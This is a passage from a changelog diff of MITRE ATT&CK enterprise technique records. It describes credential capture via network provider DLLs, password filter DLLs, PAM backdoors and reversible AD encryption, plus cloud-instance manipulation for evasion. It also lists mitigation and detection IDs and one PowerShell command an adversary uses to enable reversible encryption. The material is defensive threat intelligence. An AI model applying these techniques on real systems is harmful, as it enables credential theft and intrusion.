+                    "id": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-30 22:45:00.431000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Network Provider DLL",
+                    "description": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) \n\nAdversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)\n\nAdversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/008",
+                            "external_id": "T1556.008"
+                        },
+                        {
+                            "source_name": "NPPSPY - Huntress",
+                            "description": " Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved March 30, 2023.",
+                            "url": "https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy"
+                        },
+                        {
+                            "source_name": "NPPSPY Video",
+                            "description": "Grzegorz Tworek. (2021, December 14). How winlogon.exe shares the cleartext password with custom DLLs. Retrieved March 30, 2023.",
+                            "url": "https://www.youtube.com/watch?v=ggY3srD9dYs"
+                        },
+                        {
+                            "source_name": "NPPSPY",
+                            "description": "Grzegorz Tworek. (2021, December 15). NPPSpy. Retrieved March 30, 2023.",
+                            "url": "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy"
+                        },
+                        {
+                            "source_name": "Network Provider API",
+                            "description": "Microsoft. (2021, January 7). Network Provider API. Retrieved March 30, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api"
+                        },
+                        {
+                            "source_name": "NPLogonNotify",
+                            "description": "Microsoft. (2021, October 21). NPLogonNotify function (npapi.h). Retrieved March 30, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "CrowdStrike Falcon OverWatch",
+                        "Jai Minton"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2026-04-16 20:07:53.025000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1024: Restrict Registry Permissions",
+                            "M1028: Operating System Configuration",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0580: Detect Network Provider DLL Registration and Credential Capture"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 19:05:45.829000+00:00",
+                    "modified": "2026-05-12 15:12:00.626000+00:00",
+                    "name": "Password Filter DLL",
+                    "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/002",
+                            "external_id": "T1556.002"
+                        },
+                        {
+                            "source_name": "Carnal Ownage Password Filters Sept 2013",
+                            "description": "Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.",
+                            "url": "http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Vincent Le Toux"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.626000+00:00\", \"old_value\": \"2026-04-16 20:07:53.031000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0472: Detect Malicious Password Filter DLL Registration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-26 04:01:09.648000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Pluggable Authentication Modules",
+                    "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/003",
+                            "external_id": "T1556.003"
+                        },
+                        {
+                            "source_name": "Apple PAM",
+                            "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.",
+                            "url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt"
+                        },
+                        {
+                            "source_name": "Man Pam_Unix",
+                            "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.",
+                            "url": "https://linux.die.net/man/8/pam_unix"
+                        },
+                        {
+                            "source_name": "PAM Creds",
+                            "description": "Fern\u00e1ndez, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/"
+                        },
+                        {
+                            "source_name": "Red Hat PAM",
+                            "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.",
+                            "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules"
+                        },
+                        {
+                            "source_name": "PAM Backdoor",
+                            "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.",
+                            "url": "https://github.com/zephrax/linux-pam-backdoor"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "George Allen, VMware Carbon Black",
+                        "Scott Knight, @sdotknight, VMware Carbon Black"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-16 20:07:53.037000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0454: Detect Malicious Modification of Pluggable Authentication Modules (PAM)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-01-13 20:02:28.349000+00:00",
+                    "modified": "2026-05-12 15:12:00.718000+00:00",
+                    "name": "Reversible Encryption",
+                    "description": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)\n\nIf the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:\n\n1. Encrypted password (<code>G$RADIUSCHAP</code>) from the Active Directory user-structure <code>userParameters</code>\n2. 16 byte randomly-generated value (<code>G$RADIUSCHAPKEY</code>) also from <code>userParameters</code>\n3. Global LSA secret (<code>G$MSRADIUSCHAPKEY</code>)\n4. Static key hardcoded in the Remote Access Subauthentication DLL (<code>RASSFM.DLL</code>)\n\nWith this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)\n\nAn adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to \"Windows Server 2008\" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code>.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/005",
+                            "external_id": "T1556.005"
+                        },
+                        {
+                            "source_name": "dump_pwd_dcsync",
+                            "description": "Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.",
+                            "url": "https://adsecurity.org/?p=2053"
+                        },
+                        {
+                            "source_name": "store_pwd_rev_enc",
+                            "description": "Microsoft. (2021, October 28). Store passwords using reversible encryption. Retrieved January 3, 2022.",
+                            "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption"
+                        },
+                        {
+                            "source_name": "how_pwd_rev_enc_1",
+                            "description": "Teusink, N. (2009, August 25). Passwords stored using reversible encryption: how it works (part 1). Retrieved November 17, 2021.",
+                            "url": "http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html"
+                        },
+                        {
+                            "source_name": "how_pwd_rev_enc_2",
+                            "description": "Teusink, N. (2009, August 26). Passwords stored using reversible encryption: how it works (part 2). Retrieved November 17, 2021.",
+                            "url": "http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.718000+00:00\", \"old_value\": \"2026-04-16 20:07:53.082000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0589: Detect Modification of Authentication Process via Reversible Encryption"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-08-30 18:03:05.864000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Modify Cloud Compute Infrastructure",
+                    "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1578",
+                            "external_id": "T1578"
+                        },
+                        {
+                            "source_name": "Mandiant M-Trends 2020",
+                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2026-04-16 20:07:52.919000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0308: Detection Strategy for Modify Cloud Compute Infrastructure"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-14 14:45:15.978000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Create Cloud Instance",
+                    "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1578/002",
+                            "external_id": "T1578.002"
+                        },
+                        {
+                            "source_name": "Mandiant M-Trends 2020",
+                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arun Seelagan, CISA"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-16 20:07:52.862000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0449: Detection Strategy for Modify Cloud Compute Infrastructure: Create Cloud Instance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-09 15:33:13.563000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Create Snapshot",
+                    "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1578/001",
+                            "external_id": "T1578.001"
+                        },
+                        {
+                            "source_name": "Mandiant M-Trends 2020",
+                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-16 20:07:52.934000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0423: Detection Strategy for Modify Cloud Compute Infrastructure: Create Snapshot"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-16 17:23:06.508000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Delete Cloud Instance",
+                    "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1578/003",
+                            "external_id": "T1578.003"
+                        },
+                        {
+                            "source_name": "Mandiant M-Trends 2020",
+                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arun Seelagan, CISA"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2026-04-16 20:07:52.915000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0084: Detection Strategy for Modify Cloud Compute Infrastructure: Delete Cloud Instance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-05 14:19:17.486000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "Modify Cloud Compute Configurations",
+                    "description": "Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim\u2019s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.\n\nFor example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim\u2019s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1578/005",
+                            "external_id": "T1578.005"
+                        },
+                        {
+                            "source_name": "Microsoft Cryptojacking 2023",
+                            "description": "Microsoft Threat Intelligence. (2023, July 25). Cryptojacking: Understanding and defending against cloud compute resource abuse. Retrieved September 5, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/"
+                        },
+                        {
+                            "source_name": "Microsoft Azure Policy",
+                            "description": "Microsoft. (2023, August 30). Azure Policy built-in policy definitions. Retrieved September 5, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Amir Gharib, Microsoft Threat Intelligence",
+                        "Blake Strom, Microsoft Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
